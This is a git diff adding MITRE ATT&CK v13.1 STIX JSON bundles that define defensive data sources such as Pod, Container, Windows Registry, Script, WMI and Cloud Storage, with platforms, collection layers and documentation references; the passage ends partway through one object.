b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ffd73905-2e51-4f2d-8549-e72fb0eb6c38.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e65d3aa0-08c0-49bc-8e2f-d7b57aa839b5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--ffd73905-2e51-4f2d-8549-e72fb0eb6c38", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Snapshot Enumeration", + "description": "An extracted list of snapshops within a cloud environment (ex: AWS describe-snapshots)", + "x_mitre_data_source_ref": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf.json new file mode 100644 index 0000000000000000000000000000000000000000..9f0d13a4b827c21b680fcc9cb93fee430b4ce25f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--a1cdd805-22b9-4886-83f2-315d7e12af6b", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0014", + "external_id": "DS0014" + }, + { + "source_name": "Kube Kubectl", + "description": "kubernetes. (n.d.). kubectl. Retrieved October 13, 2021.", + "url": "https://kubernetes.io/docs/reference/kubectl/kubectl/" + }, + { + "source_name": "Kube Pod", + "description": "kubenetes. (n.d.). Pod v1 core. Retrieved October 13, 2021.", + "url": "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#pod-v1-core" + } + ], + "modified": "2021-11-10T09:30:48.697Z", + "name": "Pod", + "description": "A single unit of shared resources within a cluster, comprised of one or more containers(Citation: Kube Kubectl)(Citation: Kube Pod)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--072ec5a7-00ba-466f-9057-69751a22a967.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--072ec5a7-00ba-466f-9057-69751a22a967.json new file mode 100644 index 0000000000000000000000000000000000000000..fae7371666c77336966d87dff0036fa548e7b94c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--072ec5a7-00ba-466f-9057-69751a22a967.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--b957446b-551e-48b5-a937-d0638bf1a11d", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--072ec5a7-00ba-466f-9057-69751a22a967", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0032", + "external_id": "DS0032" + }, + { + "source_name": "Docker Docs Container", + "description": "docker docs. (n.d.). Containers. Retrieved October 13, 2021.", + "url": "https://docs.docker.com/engine/api/v1.41/#tag/Container" + } + ], + "modified": "2021-11-10T09:30:48.694Z", + "name": "Container", + "description": "A standard unit of virtualized software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another(Citation: Docker Docs Container)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6.json new file mode 100644 index 0000000000000000000000000000000000000000..1054838015f48d04f38e34fb27525eb0b7fc3842 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--eac872d1-e227-4b9d-abd4-b01198366267", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:50:43.993Z", + "name": "User Account", + "description": "A profile representing a user, device, service, or application used to authenticate and access resources", + "x_mitre_platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Container", + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0002", + "external_id": "DS0002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0.json new file mode 100644 index 0000000000000000000000000000000000000000..baab00723b5995f1955226c6cba601b952fe9706 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--4d3048c4-e889-4705-b9fc-8068a2a90b74", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0024", + "external_id": "DS0024" + }, + { + "source_name": "Microsoft Registry", + "description": "Microsoft. (2018, May 31). Registry. Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + } + ], + "modified": "2022-05-11T14:00:00.188Z", + "name": "Windows Registry", + "description": "A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e.json new file mode 100644 index 0000000000000000000000000000000000000000..14452c1c5d1dbd0630822e00ee97a56e65c39340 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--63ab1928-876f-468b-a9ab-46da0f9a1b3c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:50:56.964Z", + "name": "Script", + "description": "A file or stream containing a list of commands, allowing them to be launched in sequence(Citation: Microsoft PowerShell Logging)(Citation: FireEye PowerShell Logging)(Citation: Microsoft AMSI)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0012", + "external_id": "DS0012" + }, + { + "source_name": "FireEye PowerShell Logging", + "description": "Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html" + }, + { + "source_name": "Microsoft AMSI", + "description": "Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + }, + { + "source_name": "Microsoft PowerShell Logging", + "description": "Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52.json new file mode 100644 index 0000000000000000000000000000000000000000..b2b1735ca5a22d8868f507719900693b3642b67d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--33259539-7193-464e-bf8e-ef9f7fa8ed4f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0007", + "external_id": "DS0007" + }, + { + "source_name": "Microsoft Image", + "description": "Microsoft. (2021, August 23). Create a managed image of a generalized VM in Azure. Retrieved October 13, 2021.", + "url": "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource" + }, + { + "source_name": "Amazon AMI", + "description": "Amazon. (n.d.). Amazon Machine Images (AMI). Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + } + ], + "modified": "2021-11-10T09:30:48.696Z", + "name": "Image", + "description": "A single file used to deploy a virtual machine/bootable disk into an on-premise or third-party cloud environment(Citation: Microsoft Image)(Citation: Amazon AMI)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4.json new file mode 100644 index 0000000000000000000000000000000000000000..6689d84a2ea76525ec6e409dc7a014e5df424c84 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--9f3fa38e-8b88-4e56-ab94-e1eb1d1058f3", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Azure AD", + "Google Workspace", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0006", + "external_id": "DS0006" + }, + { + "source_name": "Medium Authentication Tokens", + "description": "Hsu, S. (2018, June 30). Session vs Token Based Authentication. Retrieved September 29, 2021.", + "url": "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4" + }, + { + "source_name": "Auth0 Access Tokens", + "description": "Auth0. (n.d.). Access Tokens. Retrieved September 29, 2021.", + "url": "https://auth0.com/docs/tokens/access-tokens" + } + ], + "modified": "2022-03-30T14:26:51.807Z", + "name": "Web Credential", + "description": "Credential material, such as session cookies or tokens, used to authenticate to web applications and services(Citation: Medium Authentication Tokens)(Citation: Auth0 Access Tokens)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--221adcd5-cccf-44df-9be6-ef607a6e1c3c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--221adcd5-cccf-44df-9be6-ef607a6e1c3c.json new file mode 100644 index 0000000000000000000000000000000000000000..d8ed1f26ca4250a49b8e83aaf75cdf22f030ddb3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--221adcd5-cccf-44df-9be6-ef607a6e1c3c.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--562bf716-cba0-49f5-9f50-23fdd833cdb8", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--221adcd5-cccf-44df-9be6-ef607a6e1c3c", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0023", + "external_id": "DS0023" + }, + { + "source_name": "Microsoft Named Pipes", + "description": "Microsoft. (2018, May 31). Named Pipes. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Named Pipe", + "description": "Mechanisms that allow inter-process communication locally or over the network. A named pipe is usually found as a file and processes attach to it(Citation: Microsoft Named Pipes)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--29aa4e0e-4a26-4f79-a9bc-1ae66df1c923.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--29aa4e0e-4a26-4f79-a9bc-1ae66df1c923.json new file mode 100644 index 0000000000000000000000000000000000000000..ee60694652bf113c238cb20994dc505a4d28d0f1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--29aa4e0e-4a26-4f79-a9bc-1ae66df1c923.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--9eff346c-3df1-404e-8e3b-35f89fec0a96", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_collection_layers": [ + "OSINT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--29aa4e0e-4a26-4f79-a9bc-1ae66df1c923", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0037", + "external_id": "DS0037" + } + ], + "modified": "2021-10-20T15:05:19.275Z", + "name": "Certificate", + "description": "A digital document, which highlights information such as the owner's identity, used to instill trust in public keys used while encrypting network communications", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--2cd6cc81-d86e-4595-a4f0-43f5519f14e6.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--2cd6cc81-d86e-4595-a4f0-43f5519f14e6.json new file mode 100644 index 0000000000000000000000000000000000000000..363237ab294aa5dd948ea7c8e444609335fefd2f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--2cd6cc81-d86e-4595-a4f0-43f5519f14e6.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--bbe4d177-c650-4528-90c9-611c8ba21847", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--2cd6cc81-d86e-4595-a4f0-43f5519f14e6", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0005", + "external_id": "DS0005" + }, + { + "source_name": "Microsoft WMI System Classes", + "description": "Microsoft. (2018, May 31). WMI System Classes. Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes" + }, + { + "source_name": "Microsoft WMI Architecture", + "description": "Microsoft. (2018, May 31). WMI Architecture. Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture" + } + ], + "modified": "2021-11-10T09:30:48.699Z", + "name": "WMI", + "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers(Citation: Microsoft WMI System Classes)(Citation: Microsoft WMI Architecture)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc.json new file mode 100644 index 0000000000000000000000000000000000000000..767d3b8970cb411438876ddec8a2c68038c86f38 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--3456d744-cddd-4022-84e8-c6f3c3369c0e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0010", + "external_id": "DS0010" + }, + { + "source_name": "Amazon S3", + "description": "Amazon. (n.d.). Amazon S3. Retrieved October 13, 2021.", + "url": "https://aws.amazon.com/s3/" + }, + { + "source_name": "Azure Blob Storage", + "description": "Microsoft. (n.d.). Azure Blob Storage. Retrieved October 13, 2021.", + "url": "https://azure.microsoft.com/en-us/services/storage/blobs/" + }, + { + "source_name": "Google Cloud Storage", + "description": "Google. (n.d.). Cloud Storage. Retrieved October 13, 2021.", + "url": "https://cloud.google.com/storage" + } + ], + "modified": "2021-11-10T09:30:48.694Z", + "name": "Cloud Storage", + "description": "Data object storage infrastructure hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--38fe306c-bdec-4f3d-8521-b72dd32dbd17.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--38fe306c-bdec-4f3d-8521-b72dd32dbd17.json new file mode 100644 index 0000000000000000000000000000000000000000..3893dbcbbff31d6b129dfb1720fa92a979e644d5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--38fe306c-bdec-4f3d-8521-b72dd32dbd17.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--4bc4267b-7394-470b-8024-a0779779144d", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_collection_layers": [ + "OSINT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--38fe306c-bdec-4f3d-8521-b72dd32dbd17", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0035", + "external_id": "DS0035" + } + ], + "modified": "2021-10-20T15:05:19.275Z", + "name": "Internet Scan", + "description": "Information obtained (commonly via active network traffic probes or web crawling) regarding various types of resources and servers connected to the public Internet", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--3bef4799-906c-409c-ac00-3fb7a1e352e6.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--3bef4799-906c-409c-ac00-3fb7a1e352e6.json new file mode 100644 index 0000000000000000000000000000000000000000..a8e4227753489a991c53d8b5579603fe605ce7df --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--3bef4799-906c-409c-ac00-3fb7a1e352e6.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--4c70a450-ced5-44f0-8f60-361a6d59627c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_collection_layers": [ + "OSINT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--3bef4799-906c-409c-ac00-3fb7a1e352e6", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0021", + "external_id": "DS0021" + } + ], + "modified": "2021-10-20T15:05:19.273Z", + "name": "Persona", + "description": "A malicious online profile representing a user commonly used by adversaries to social engineer or otherwise target victims", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec.json new file mode 100644 index 0000000000000000000000000000000000000000..01c3f970823f4a6dbd7a5aa4b78fd3dbe31a224c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--435fda01-f54c-4bee-84ca-dc5af7177707", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Office 365", + "SaaS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0036", + "external_id": "DS0036" + }, + { + 